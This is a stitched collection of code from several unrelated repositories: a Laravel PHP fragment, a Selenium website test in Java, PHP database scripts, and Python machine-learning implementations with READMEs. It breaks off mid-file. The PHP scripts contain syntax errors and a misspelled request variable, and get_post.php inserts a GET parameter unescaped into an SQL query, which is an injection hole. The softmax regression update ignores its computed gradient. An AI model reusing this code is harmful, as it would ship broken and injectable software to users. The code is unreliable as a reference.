}
echo $output;
}
public function fetchD(Request $request){
$idD = $request->select;
// dd($idD);
$resultD=array();
$queryD=DB::table('tbl_subdistricts')
->select('tbl_subdistricts.subdistrict_name','tbl_subdistricts.subdistrict_id','tbl_subdistricts.subdistrict_code')
->where(DB::raw('left(tbl_subdistricts.subdistrict_code, 4)'),'=',$idD)
->get();
$outputD='<option value="%"> ตำบล </option>';
foreach ($queryD as $rowD) {
$outputD.='<option value="'.$rowD->subdistrict_code.'">'.$rowD->subdistrict_name.'</option>';
}
echo $outputD;
}
}
|
1f63320bd67b02b3c6baf9f1a5e65228baa2572d
|
[
"PHP"
] | 7
|
PHP
|
aungdex13/gistda-career
|
3a111e432cfbcc95d53d97bb2b07653e086c7040
|
c9151cab27bd9b47a328a21d44d94a731d113ebe
|
refs/heads/main
|
<file_sep># Testing-using-selenium<file_sep>package test1;
//import junit.framework.Assert;
import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.chrome.ChromeDriver;
import org.testng.Assert;
import org.testng.annotations.BeforeTest;
public class NewTest {
@BeforeTest
public void beforeTest()throws Throwable {
System.setProperty("webdriver.chrome.driver","C:\\Users\\hp\\chromedriver.exe");
WebDriver driver=new ChromeDriver();
driver.get("https://www.thesparksfoundationsingapore.org/");
driver.manage().window().maximize();
WebElement logo=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[1]/h1/a/img"));
Assert.assertTrue(logo.isDisplayed());
String title=driver.getTitle();
System.out.println(title);
Assert.assertEquals("The Sparks Foundation | Home", title);
WebElement contact=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[6]/a"));
contact.click();
Thread.sleep(3000);
String header=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[2]/h2")).getText();
Assert.assertEquals("Contact Us", header);
WebElement joinus=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[5]/a"));
joinus.click();
Thread.sleep(3000);
WebElement why=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[5]/ul/li[1]/a\n"));
why.click();
Thread.sleep(3000);
String span=driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[3]/h3/span")).getText();
Assert.assertEquals("Be Your Own Boss", span);
WebElement links=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[4]/a"));
links.click();
Thread.sleep(3000);
WebElement AI=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[4]/ul/li[3]/a"));
AI.click();
Thread.sleep(3000);
WebElement nextlink=driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/div/div/div[2]/div/a"));
nextlink.click();
Thread.sleep(3000);
String MainWindow1=driver.getWindowHandle();
// String link5=driver.findElement(By.xpath("/html/head/title")).getText();
// Assert.assertEquals("Can AI fix education? We asked <NAME> - The Verge", link5);
driver.switchTo().window(MainWindow1);
WebElement program=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[3]/a"));
program.click();
Thread.sleep(3000);
WebElement workshop=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[3]/ul/li[4]/a"));
workshop.click();
Thread.sleep(3000);
WebElement student=driver.findElement(By.xpath("/html/body/div[2]/div/div[2]/div/ul/li[1]/a"));
student.click();
Thread.sleep(3000);
String studentscholar=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[2]/h2")).getText();
Assert.assertEquals("Student Scholarship Program",studentscholar );
WebElement ClickOnAboutUsPage = driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[1]/a"));
ClickOnAboutUsPage.click();
Thread.sleep(3000);
WebElement ClickOnExeutiveAboutUsDropdown = driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[1]/ul/li[4]/a"));
ClickOnExeutiveAboutUsDropdown.click();
Thread.sleep(3000);
String ExecutiveTeamHeader = driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[2]/h2")).getText();
Assert.assertEquals("Executive Team", ExecutiveTeamHeader);
String FounderName = driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/div/h4")).getText();
Assert.assertEquals("<NAME>", FounderName);
WebElement FounderDescription = driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/div/p"));
Assert.assertTrue(FounderDescription.isDisplayed());
WebElement FounderPicture = driver.findElement(By.xpath("/html/body/div[2]/div/div[1]/div/div[1]/a/img"));
if(FounderPicture.isDisplayed())
{
FounderPicture.click();
Thread.sleep(3000);
String title1 = driver.getTitle();
String MainWindow2=driver.getWindowHandle();
driver.switchTo().window(MainWindow2);
// Assert.assertEquals(false, false)
System.out.println(title1);
}
else
{
System.out.println("Founder Picture not dislayed");
}
WebElement policy=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[2]/a"));
policy.click();
Thread.sleep(3000);
WebElement ethics=driver.findElement(By.xpath("//*[@id=\"link-effect-3\"]/ul/li[2]/ul/li[2]/a\n"));
ethics.click();
Thread.sleep(3000);
WebElement homepage=driver.findElement(By.xpath("//*[@id=\"home\"]/div/div[1]/h1/a"));
homepage.click();
driver.close();
}
}
|
648277a7dda7ab268df6b101751d8c28d7d2678f
|
[
"Markdown",
"Java"
] | 2
|
Markdown
|
riyachugh2327/Testing-using-selenium
|
0b67472ea39e21b4b5500eddf12460438d646df8
|
41e71ede7d27ab86ee53bc0b4e22eb8819d7b897
|
refs/heads/master
|
<repo_name>keswara/sb<file_sep>/connect.php
<?php
define('Host','chaiae.me');
define('USER','root';);
define('PASS','<PASSWORD>');
define('DATABASE','sbfram');
$con = mysqli_connect(HOST,USER,PASS,DATABASE);
if(con->connect_error){
die("ไม่สามารถติดต่อฐานข้อมูลได้ error:" . $con->connect_error);
}
else{
mysqli_set_charset($con, "utf8");
}
?><file_sep>/get_post.php
<?php
header("content-type:text/javascript;charset=utf-8");
define('Host','chaiae.me');
define('USER','root';);
define('PASS','<PASSWORD>');
define('DB','sbfram');
$con = mysqli_connect(HOST,USER,PASS,DB);
if($_SERVER['REGUEST_METHOD'] == 'GET'){
$status = $_GET['status'];
$con = mysqli_connect(Host, USER, PASS, DB) or die('Unable to Connect');
mysqli_set_charset($con, utf8);
$sql ="SELECT * FROM content WHERE status='" . $status ."'";
$r =mysqli_query($con,$sql);
$result = array();
while ($row = mysqli_fetch_array($r)) {
array_push($result, array("comment" => $row['comment']));
}
echo json_decode(array('result' => $result));
mysqli_close($con);
}
?>
|
25ac163845ac2185e2fa4352e5cedbbb6f7378cd
|
[
"PHP"
] | 2
|
PHP
|
keswara/sb
|
fdb04cf647e8b0280c4c048d226237fb6b2b5774
|
b45a1ee7f33238a151c89e59cc9bae4133afd0f2
|
refs/heads/master
|
<repo_name>z1960847030/book-ssm<file_sep>/src/test/java/Mytest.java
import com.zsx.pojo.User;
import com.zsx.service.UserServiceImpl;
import org.junit.Test;
import org.springframework.context.ApplicationContext;
import org.springframework.context.support.ClassPathXmlApplicationContext;
public class Mytest {
@Test
public void test(){
ApplicationContext context = new ClassPathXmlApplicationContext("applicationContext.xml");
UserServiceImpl userServiceImpl = context.getBean("userServiceImpl", UserServiceImpl.class);
userServiceImpl.UserRegist(new User(2,"邹双雄","123456","hello<PASSWORD>"));
System.out.println("注册成功");
}
}
<file_sep>/src/main/java/com/zsx/service/UserService.java
package com.zsx.service;
import com.zsx.pojo.User;
public interface UserService {
int UserRegist(User user);
User getUser(String username);
}
<file_sep>/src/main/java/com/zsx/service/UserServiceImpl.java
package com.zsx.service;
import com.zsx.dao.UserMapper;
import com.zsx.pojo.User;
import org.springframework.beans.factory.annotation.Autowired;
public class UserServiceImpl implements UserService{
private UserMapper userMapper;
public void setUserMapper(UserMapper userMapper) {
this.userMapper = userMapper;
}
@Override
public int UserRegist(User user) {
return userMapper.UserRegist(user);
}
@Override
public User getUser(String username) {
return userMapper.getUser(username);
}
}
<file_sep>/README.md
# book-ssm
使用ssm框架整合的书城项目,只是初步设置了各个页面的相互连接,需要进行什么业务操作可以在代码中再去实现
|
ed89cc7cd8fa4bbe89a6d07b9714994f7bb11353
|
[
"Markdown",
"Java"
] | 4
|
Java
|
z1960847030/book-ssm
|
29e29c3f27a3e66a049bfc8a7c2b90ee4d70f645
|
8efff126539b45cb6268a28aeedceccf1a4c1a82
|
refs/heads/master
|
<repo_name>Renl1001/MachineLearning<file_sep>/KNN/README.md
# KNN算法
## 算法流程
1. 加载数据;
2. 计算测试点与所有训练集的点之间的距离(欧氏距离);
3. 对距离进行排序,选择与测试点最近的k个点;
4. 计算最近的k个点的标签出现的次数,找到出现次数最多的标签作为测试点的标签。
## 结果
加载数据:

对点(2,3)进行分类,结果如下图:

其中紫色和黄色分布是两种类别,可以看到(2,3)位置是一个紫色的X
随机生成十个点进行分类,分类的结果如下图:

通过肉眼观察发现,分类的准确率比较高。
<file_sep>/CART/README.md
# 朴素贝叶斯算法
## 算法流程
1. 加载训练数据;
2. 计算当前的Gain;
3. 循环遍历每个特征,将该特征的所有值存入set中;
4. 循环遍历每个特征值,按照该特征对数据集进行划分;
5. 计算Gain,更新最大的Gain并记录是哪一个特征和哪个值产生的;
6. 根据设置的miniGain来判断是否继续建立子树(剪枝),如果best_gain大于minGain,则递归调用建树函数建立当前节点的左右子树;否则保存结果,该点作为叶子节点;
## 结果
当设置minGain=0.05时生成的决策树图像如下:

当设置minGain=0.1时生成的决策树图像如下:
当设置minGain=0.1时生成的决策树图像如下:
<file_sep>/Kmeans/test.py
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
from kmeans import KMeans
import matplotlib.pyplot as plt
# 加载数据集,DataFrame格式,最后将返回为一个matrix格式
def loadDataset(infile):
df = pd.read_csv(infile, sep='\t', header=0, dtype=str, na_filter=False)
data = np.array(df).astype(np.float)
return data
def show_data(data):
for i in range(data.shape[0]):
x0 = data[:, 0]
x1 = data[:, 1]
plt.scatter(x0[i], x1[i])
plt.title("all point")
plt.axis([0,10,0,10])
outname = "./save/data.png"
plt.savefig(outname)
plt.show()
# 绘制图形
def show_result(data, k, centroids, labels, step):
colors = ['b','g','r','k','c','m','y']
for i in range(k):
index = np.nonzero(labels==i)[0]
x0 = data[index, 0]
x1 = data[index, 1]
for j in range(len(x0)):
plt.scatter(x0[j], x1[j], color=colors[i])
plt.scatter(centroids[i,0],centroids[i,1],marker='x',color=colors[i],\
linewidths=7)
plt.title("step={}".format(step))
plt.axis([0,10,0,10])
outname = "./save/result" + str(k) + ".png"
plt.savefig(outname)
plt.show()
if __name__=='__main__':
data = loadDataset('data.txt')
show_data(data)
k = 4
clf = KMeans(k)
clf.fit(data)
show_result(data, k, clf._centroids, clf._labels, clf.step)
<file_sep>/NaiveBayes/bayes.py
# -*- coding:utf-8 -*-
import numpy as np
class NaiveBayes:
def __init__(self):
self.p0_vect = None
self.p1_vect = None
self.p_neg = None
self.word_set = None
def _create_word_set(self, data):
"""
创建一个词库集合
"""
word_set = set([])
for line in data:
word_set = word_set | set(line)
self.word_set = list(word_set)
def _word2vec(self, sample):
"""
将每行的单词转化成统计出现次数的向量
"""
sample_vector = [0] * len(self.word_set)
for word in sample:
if word in self.word_set:
sample_vector[self.word_set.index(word)] += 1
return sample_vector
def _trainNB(self, train_samples, train_classes):
"""对数据进行训练,计算条件概率
Arguments:
train_samples {numpy} -- 统计单词出现次数的训练数据
train_classes {numpy} -- 标签
Returns:
truple -- 正负分类的条件概率以及分类概率
"""
numTrainDocs = len(train_samples) # 统计样本个数
numWords = len(train_samples[0]) # 统计特征个数,理论上是词库的长度
p_neg = sum(train_classes) / float(numTrainDocs) # 计算负样本出现的概率
p0Num = np.ones(numWords) # 初始样本个数为1,防止条件概率为0,影响结果
p1Num = np.ones(numWords)
p0InAll = 2.0 # 词库中只有两类,初始化为2
p1InAll = 2.0
# 更新正负样本数据
for i in range(numTrainDocs):
if train_classes[i] == 1:
p1Num += train_samples[i]
p1InAll += sum(train_samples[i])
else:
p0Num += train_samples[i]
p0InAll += sum(train_samples[i])
# 计算给定类别的条件下,词汇表中单词出现的概率
# 然后取log对数,解决条件概率乘积下溢
p0_vect = np.log(p0Num / p0InAll) # 计算类标签为0时的其它属性发生的条件概率
p1_vect = np.log(p1Num / p1InAll) # log函数默认以e为底 # p(ci|w=0)
self.p0_vect = p0_vect
self.p1_vect = p1_vect
self.p_neg = p_neg
return p0_vect, p1_vect, p_neg
def train(self, train_sample, classes):
""" 训练 """
self._create_word_set(train_sample)
trainMat = []
for postinDoc in train_sample:
trainMat.append(self._word2vec(postinDoc))
self._trainNB(np.array(trainMat), np.array(classes))
def _classifyNB(self, test_vector):
"""
使用朴素贝叶斯进行分类,返回结果为0/1
"""
prob_y0 = sum(test_vector * self.p0_vect) + np.log(1 - self.p_neg)
prob_y1 = sum(test_vector * self.p1_vect) + np.log(self.p_neg) # log是以e为底
if prob_y0 < prob_y1:
return 1
else:
return 0
def classify(self, testSample):
"""使用朴素贝叶斯进行分类,返回结果为0/1"""
test_vector = self._word2vec(testSample)
result = self._classifyNB(test_vector)
print(testSample, 'classified as: ', result)
return result
<file_sep>/LogisticRegression/logistic_regression.py
import numpy as np
class LogisticRegression():
def __init__(self):
self._alpha = None
self._w = None
def _sigmoid(self, x):
"""sigmoid函数
Arguments:
x {numpy} -- 输入的x
Returns:
numpy -- sigmoid(x)
"""
return 1.0/(1 + np.exp(-x))
def fit(self, train_X, train_y, alpha=0.01, maxIter=200):
"""逻辑回归训练
Arguments:
train_X {numpy} -- 训练集的输入
train_y {numpy} -- 训练集的标签
Keyword Arguments:
alpha {float} -- 学习率 (default: {0.01})
maxIter {int} -- 最大迭代次数 (default: {100})
Returns:
numpy -- 权重
"""
dataMat = np.mat(train_X) # size: m*n
labelMat = np.mat(train_y).T # size: m*1
n = dataMat.shape[1]
weights = np.random.random((n, 1))
for _ in range(maxIter):
hx = self._sigmoid(dataMat * weights) # 1. 计算预测函数h(x)
J = labelMat - hx # 2. 计算损失函数J(w)
weights = weights + alpha * dataMat.transpose() * J # 3. 根据误差修改回归权重参数
self._w = weights
return weights
#使用学习得到的参数进行分类
def predict(self, test_X):
"""使用学习得到的参数进行分类
Arguments:
test_X {numpy} -- 测试集的输入值
Returns:
numpy -- 预测结果
"""
dataMat = np.mat(test_X)
hx = self._sigmoid(dataMat*self._w)
hx = hx.getA()
pre_y = hx > 0.5 # 概率大于0.5则标签为1
return pre_y<file_sep>/KNN/test.py
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import random
from KNN import KNN
import matplotlib.pyplot as plt
# 加载数据集,DataFrame格式,最后将返回为一个matrix格式
def loadDataset(infile):
df = pd.read_csv(infile, sep='\t', header=0, dtype=str, na_filter=False)
data = np.array(df).astype(np.float)
return data
def show_data(data):
plt.scatter(data[:, 0], data[:, 1], c=data[:, 2])
plt.title("all point")
plt.axis([0,10,0,10])
outname = "./save/data.png"
plt.savefig(outname)
plt.show()
# 绘制图形
def show_result(data, k, test_X, labels):
plt.scatter(data[:, 0], data[:, 1], c=data[:, 2])
plt.scatter(test_X[:, 0], test_X[:, 1], c=labels,marker='x')
plt.title("result")
plt.axis([0,10,0,10])
outname = "./save/result" + str(k) + ".png"
plt.savefig(outname)
plt.show()
if __name__=='__main__':
data = loadDataset('data.txt')
show_data(data)
k = 3
clf = KNN(k)
test_X = [2,3]
label = clf.classify_one(test_X, data[:,:2], data[:,2])
test_X = np.array([test_X])
label = np.array([label])
show_result(data, 'one', test_X, label)
test_X = []
for i in range(10):
x = random.random()*10
y = random.random()*10
test_X.append([x,y])
labels = clf.classify(test_X, data[:,:2], data[:,2])
test_X = np.array(test_X)
labels = np.array(labels)
show_result(data, 'all', test_X, labels)
<file_sep>/CART/test.py
import csv
from collections import defaultdict
import pydotplus
from cart import CART
def dotgraph(decisionTree, dcHeadings):
dcNodes = defaultdict(list)
def toString(iSplit, decisionTree, bBranch, szParent="null", indent=''):
if decisionTree.results is not None: # leaf node
lsY = []
for szX, n in decisionTree.results.items():
lsY.append('%s:%d' % (szX, n))
dcY = {"name": "%s" % ', '.join(lsY), "parent": szParent}
dcSummary = decisionTree.summary
dcNodes[iSplit].append([
'leaf', dcY['name'], szParent, bBranch, dcSummary['impurity'],
dcSummary['samples']
])
return dcY
else:
szCol = 'Column %s' % decisionTree.col
if szCol in dcHeadings:
szCol = dcHeadings[szCol]
if isinstance(decisionTree.value, int) or isinstance(
decisionTree.value, float):
decision = '%s >= %s' % (szCol, decisionTree.value)
else:
decision = '%s == %s' % (szCol, decisionTree.value)
toString(iSplit + 1, decisionTree.trueBranch, True, decision,
indent + '\t\t')
toString(iSplit + 1, decisionTree.falseBranch, False, decision,
indent + '\t\t')
dcSummary = decisionTree.summary
dcNodes[iSplit].append([
iSplit + 1, decision, szParent, bBranch, dcSummary['impurity'],
dcSummary['samples']
])
return
toString(0, decisionTree, None)
lsDot = [
'digraph Tree {',
'node [shape=box, style="filled, rounded", color="black", fontname=helvetica] ;',
'edge [fontname=helvetica] ;'
]
i_node = 0
dcParent = {}
dcNodes = sorted(dcNodes.items(), key=lambda obj: obj[0])
for nSplit, lsY in dcNodes:
# print('-----')
# print(nSplit, lsY)
for lsX in lsY:
iSplit, decision, szParent, bBranch, szImpurity, szSamples = lsX
if type(iSplit) == int:
szSplit = '%d-%s' % (iSplit, decision)
dcParent[szSplit] = i_node
lsDot.append(
'%d [label=<%s<br/>impurity %s<br/>samples %s>, fillcolor="#e5813900"] ;'
% (i_node, decision.replace('>=', '≥').replace(
'?', ''), szImpurity, szSamples))
else:
lsDot.append(
'%d [label=<impurity %s<br/>samples %s<br/>class %s>, fillcolor="#e5813900"] ;'
% (i_node, szImpurity, szSamples, decision))
if szParent != 'null':
if bBranch:
szAngle = '45'
szHeadLabel = 'True'
else:
szAngle = '-45'
szHeadLabel = 'False'
szSplit = '%d-%s' % (nSplit, szParent)
p_node = dcParent[szSplit]
if nSplit == 1:
lsDot.append(
'%d -> %d [labeldistance=2.5, labelangle=%s, headlabel="%s"] ;'
% (p_node, i_node, szAngle, szHeadLabel))
else:
lsDot.append('%d -> %d ;' % (p_node, i_node))
i_node += 1
lsDot.append('}')
dot_data = '\n'.join(lsDot)
return dot_data
def loadCSV(file):
def convertTypes(s):
s = s.strip()
try:
return float(s) if '.' in s else int(s)
except ValueError:
return s
reader = csv.reader(open(file, 'rt'))
dcHeader = {}
bHeader = True
if bHeader:
lsHeader = next(reader)
for i, szY in enumerate(lsHeader):
szCol = 'Column %d' % i
dcHeader[szCol] = str(szY)
return dcHeader, [[convertTypes(item) for item in row] for row in reader]
if __name__ == "__main__":
dcHeadings, trainingData = loadCSV('fishiris.csv')
# print(trainingData[0][0])
miniGain = 0.05
clf = CART(miniGain)
clf.buildDecisionTree(trainingData)
dot_data = dotgraph(clf.decisionTree, dcHeadings)
graph = pydotplus.graph_from_dot_data(dot_data)
graph.write_png("tree{}.png".format(miniGain))
<file_sep>/Kmeans/make_data.py
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import random
if __name__ == "__main__":
file = open("data.txt", 'w')
n = random.randint(50,100)
for i in range(n):
x = random.random()*10
y = random.random()*10
file.write('{}\t{}\n'.format(x, y))
file.close()<file_sep>/Kmeans/README.md
# Kmeans算法
## 算法流程
1. 加载数据;
2. 随机生成k个点作为初始的质心点;
3. 将每个点的标签选择为与它最近的质心点(本文选用欧氏距离)每个点和最近的质心点结合成了k个簇;
4. 将每个簇的坐标的平均值作为该簇的新质心点
5. 重复3)- 4)直到每个点对应的簇都不发生变化或者达到最大迭代次数
## 结果
加载数据

当k=2时,通过6次迭代将数据聚类后结果如下图:

其中相同颜色的点表示在同一个簇中,x表示该簇的质心点,上方的step表示迭代次数。从图中可以看到,能够比较明显的将图中的点分成两类。
当k=3和4时,数据聚类后结果如下图:

<file_sep>/NaiveBayes/README.md
# 朴素贝叶斯算法
## 算法流程
1. 加载训练数据;
2. 统计数据中出现过哪些单词,记录成词库;
3. 将训练数据按照每一行转化成词向量,每行向量长度为词库的长度;
4. 循环遍历训练的词向量的每一行,统计各个词在侮辱类和非侮辱类中出现的次数以及总次数;
5. 计算每个词在两种类别的条件概率;
6. 将测试集转化成词向量;
7. 利用贝叶斯公式计算测试集中特征的条件下是侮辱类和非侮辱类的概率,并比较;
## 结果
对测试集进行验证,得到如下结果:
```shell
['love', 'my', 'girl', 'friend'] classified as: 0
['stupid', 'garbage'] classified as: 1
['Haha', 'I', 'really', 'Love', 'You'] classified as: 0
['This', 'is', 'my', 'dog'] classified as: 0
```
可以看到 ['stupid', 'garbage']是侮辱性留言,其他的不是。<file_sep>/bp/make_data.py
# -*- coding: utf-8 -*-
import numpy as np
import random
if __name__ == "__main__":
file = open("train.txt", 'w')
n = 1000
for i in range(n):
x = random.random()*20-10
y = random.random()*20-10
if(x**2+y**2 > 25):
lb = 1
else:
lb = 0
file.write('{}\t{}\t{}\n'.format(x, y, lb))
file.close()
file = open("test.txt", 'w')
n = random.randint(100,200)
for i in range(n):
x = random.random()*20-10
y = random.random()*20-10
file.write('{}\t{}\n'.format(x, y))
file.close()<file_sep>/bp/README.md
# KNN算法
## 算法流程
1. 加载训练数据和测试数据;
2. 初始化weights、bias和每一层的信息;
3. 循环训练每一个输入数据
4. 正向传播,将每一层的输出数据作为下一层的输入数据,计算最后的输出;
5. 计算loss;
6. 误差反向传播,计算每一层的导数;
7. 循环更新每一层的参数;
8. 重复3)- 7)n次(最大迭代次数)
## 结果
加载训练数据:

其中黄色和紫色分别表示两种类别。
对训练集进行训练得到loss曲线:

可以发现,在大概75个epoch后,loss接近趋于饱和,之后的曲线接近平行。在150个epoch后修改学习率降为原来的1/10后,loss略有降低。
通过训练后对测试集进行分类,得到测试集的标签如下图所示:

可以看到,对测试集进行了较好的分类。
<file_sep>/SoftmaxRegression/softmax_regression.py
import numpy as np
class SoftmaxRegression():
def __init__(self, k):
self.k = k
def _softmax(self, x):
"""计算softmax
Arguments:
x {numpy} -- 预测的结果
Returns:
numpy -- softmax后的结果
"""
exp = np.exp(x) # x size: m * k
sum_exp = np.sum(np.exp(x), axis=1, keepdims=True) # size: m * 1
softmax = exp / sum_exp
return softmax
def _calc_scores(self, X):
"""预测分数
Arguments:
X {numpy} -- 输入的数据X
Returns:
numpy -- 计算的分数 公式:score = X*w+b
"""
return np.dot(X, self.weights.T) + self.bias
def _ont_hot(self, y):
"""将label转化成是否是某种类别的矩阵
Arguments:
y {numpy} -- 数据的标签 size: (m)
Returns:
numpy -- size: m * k
"""
one_hot = np.zeros((self.m, self.k))
y = y.astype('int64')
one_hot[np.arange(self.m), y.T] = 1
return one_hot
def fit(self, X, y, lr=0.1, maxIter=200):
"""softmax回归模型训练
Arguments:
X {numpy} -- 训练集的输入
y {numpy} -- 训练集的标签
Keyword Arguments:
lr {float} -- 学习率 (default: {0.01})
maxIter {int} -- 最大迭代次数 (default: {100})
Returns:
numpy -- 权重和bias
"""
self.m, n = X.shape
self.weights = np.random.rand(self.k, n)
self.bias = np.zeros((1, self.k))
y_one_hot = self._ont_hot(y)
for i in range(maxIter):
scores = self._calc_scores(X)
hx = self._softmax(scores)
# 计算损失 y_one_hot size: m * k. hx size: m * k
loss = -(1/self.m) * np.sum(y_one_hot * np.log(hx))
# 求导
# X size: m*n hx size: m * k w size: k * n
# X.T * hx size: n * k -> w.T
dw = (1 / self.m) * np.dot(X.T, (hx - y_one_hot))
dw = dw.T
db = (1 / self.m) * np.sum(hx - y_one_hot, axis=0)
self.weights = self.weights - lr
self.bias = self.bias - lr * db
if i % 50 == 0:
print('Iter:{} loss:{}'.format(i+1, loss))
return self.weights, self.bias
def predict(self, X):
"""使用学习得到模型进行分类
Arguments:
X {numpy} -- 测试集的输入值
Returns:
numpy -- 预测结果
"""
scores = self._calc_scores(X)
hx = self._softmax(scores) # softmax
# hx size: m*k
pred = np.argmax(hx, axis=1)[:,np.newaxis]
return pred
if __name__ == "__main__":
x = np.asarray([[1,2,3,4],[1,2,3,4]])
print(x)
sr = SoftmaxRegression(3)
sr._softmax(x)
<file_sep>/bp/bp.py
# -*- coding: utf-8 -*-
import numpy as np
class SigmoidActivator(object):
"""
sigmoid激活函数
"""
def forward(self, weighted_input):
"""sigmoid激活函数
Arguments:
weighted_input {numpy} -- 未激活的输出结果z
Returns:
numpy -- sigmoid
"""
return 1.0 / (1.0 + np.exp(-weighted_input))
def backward(self, output):
"""sigmoid函数求导 反向传播
Arguments:
output {numpy} -- 输出的值
Returns:
numpy -- 求导后的值
"""
return output * (1 - output)
class Linear(object):
"""
全连接层
"""
def __init__(self, input_size, output_size, activator):
"""
初始化层信息,包括输入输出的大小,以及激活函数
"""
self.input_size = input_size
self.output_size = output_size
self.activator = activator
# 初始化参数 weight
self.W = np.random.uniform(-0.1, 0.1, (output_size, input_size))
# 初始化参数 bias
self.b = np.zeros(output_size)
# 初始化该层的输出
self.output = np.zeros(output_size)
self.delta = None
self._input = None
self._W_grad = None
self._b_grad = None
def forward(self, input):
"""向前传播
Arguments:
input {numpy} -- 该层的输入
"""
self._input = input
# z = W * x + b
Z = np.dot(self.W, input) + self.b
self.output = self.activator.forward(Z)
def backward(self, delta_array):
"""反向传播
Arguments:
delta_array {numpy} -- 上一层传回的误差
"""
self.delta = self.activator.backward(
self._input) * np.dot(self.W.T, delta_array)
self._W_grad = np.dot(delta_array.reshape(-1, 1),
self._input.reshape(-1, 1).T)
self._b_grad = delta_array
def update(self, learning_rate):
"""更新参数
Arguments:
learning_rate {float} -- 学习率
"""
self.W += learning_rate * self._W_grad
self.b += learning_rate * self._b_grad
class BP(object):
def __init__(self, layers):
self.layers = []
# 初始化创建每一层
for i in range(len(layers) - 1):
self.layers.append(Linear(
layers[i], layers[i+1], SigmoidActivator()))
def predict(self, test):
"""预测结果
Arguments:
test {numpy} -- 测试的输入数据
Returns:
list -- 预测的标签
"""
preds = []
for sample in test:
output = sample
for layer in self.layers:
layer.forward(output)
output = layer.output
pred = 1 if output[0] > 0.5 else 0
preds.append(pred)
return preds
def _forward(self, sample):
"""正向传播并预测结果
Arguments:
sample {numpy} -- 输入数据
Returns:
float -- 预测标签
"""
output = sample
# 循环每一层
for layer in self.layers:
layer.forward(output)
output = layer.output # 将上一层的输出作为输入
return output
def train(self, train_sample, labels, learning_rate=0.1, epoch=200):
"""训练bp神经网络
Arguments:
train_sample {numpy} -- 训练的输入数据
labels {numpy} -- 训练的标签
Keyword Arguments:
learning_rate {float} -- 学习率 (default: {0.1})
epoch {int} -- 最大迭代数 (default: {200})
"""
loss_list = []
for i in range(epoch):
loss = 0
for j in range(len(train_sample)):
# 1. 正向传播
output = self._forward(train_sample[j])
# 2. 计算loss
loss += (output - labels[j])**2
# 3. 误差反向传播
self._backward(labels[j])
# 4. 更新参数
self._update_weight(learning_rate)
loss_list.append(loss)
if i > 150:
learning_rate /= 10
if i % 50 == 0 or i == epoch-1:
print('------ epoch %d -------' % (i+1))
print('loss:{}'.format(loss))
return loss_list
def _backward(self, label):
"""误差反向传播
Arguments:
label {list} -- 真实标签y
"""
#计算最后一层的delta
delta = self.layers[-1].activator.backward(
self.layers[-1].output) * (label - self.layers[-1].output)
# 循环计算每一层的delta
for layer in self.layers[::-1]:
layer.backward(delta)
delta = layer.delta
def _update_weight(self, lr):
"""更新参数
Arguments:
lr {float} -- 学习率
"""
for layer in self.layers:
layer.update(lr)
<file_sep>/PCA/test.py
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from pca import PCA
def loaddata(datafile):
return np.array(pd.read_csv(datafile, sep="\t",
header=-1)).astype(np.float)
def plotBestFit(data1):
dataArr1 = np.array(data1)
m = np.shape(dataArr1)[0]
axis_x1 = []
axis_y1 = []
for i in range(m):
axis_x1.append(dataArr1[i, 0])
axis_y1.append(dataArr1[i, 1])
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(axis_x1, axis_y1, s=50, c='red', marker='s')
plt.xlabel('x1')
plt.ylabel('x2')
plt.savefig("save/output.png")
plt.show()
# 根据数据集data.txt
def main():
datafile = "data.txt"
data = loaddata(datafile)
k = 2
pca = PCA(k)
return pca.fit_transform(data)
if __name__ == "__main__":
new_data = main()
plotBestFit(new_data)
<file_sep>/SoftmaxRegression/README.md
# KNN算法
## 算法流程
1. 加载训练数据和测试数据;
2. 初始化weights和bias;
3. 计算每个分类的分数score;
4. 对score计算softmax得到预测概率h(x);
5. 计算损失函数J(w);
6. 求导并更新参数w和b
7. 重复2)- 4)n次(最大迭代次数)
## 结果
加载训练数据:

其中蓝色,黄色,紫色,绿色分别表示四个种类别。
通过训练后对测试集进行分类,得到测试集的标签如下图所示:

可以看到,对测试集进行了较好的分类。<file_sep>/CART/cart.py
class Tree:
def __init__(self,
value=None,
trueBranch=None,
falseBranch=None,
results=None,
col=-1,
summary=None,
data=None):
self.value = value
self.trueBranch = trueBranch
self.falseBranch = falseBranch
self.results = results
self.col = col
self.summary = summary
class CART:
def __init__(self, miniGain=0.4):
self.decisionTree = None
self.miniGain = miniGain
def _cal_labels_count(self, datas):
"""统计输入数据中每类标签的数量
Arguments:
datas {numpy} -- 一个二维数组,最后一列为标签
Returns:
dictionary -- 记录每类标签的一个字典
"""
labels_count = {}
for data in datas: # 统计标签的数量
# data[-1] means dataType
label = data[-1]
if label not in labels_count:
labels_count[label] = 1
else:
labels_count[data[-1]] += 1
return labels_count
def _gini(self, datas):
"""计算gini值
Arguments:
datas {numpy} -- 二维数组,最后一列表示标签
Returns:
float -- gini值
"""
length = len(datas)
labels_count = self._cal_labels_count(datas)
# 计算gini值
gini = 0.0
for i in labels_count:
gini += (labels_count[i] / length)**2
gini = 1 - gini
return gini
def split_datas(self, datas, value, column):
"""将数据通过指定的列的值分割成两个数据
Arguments:
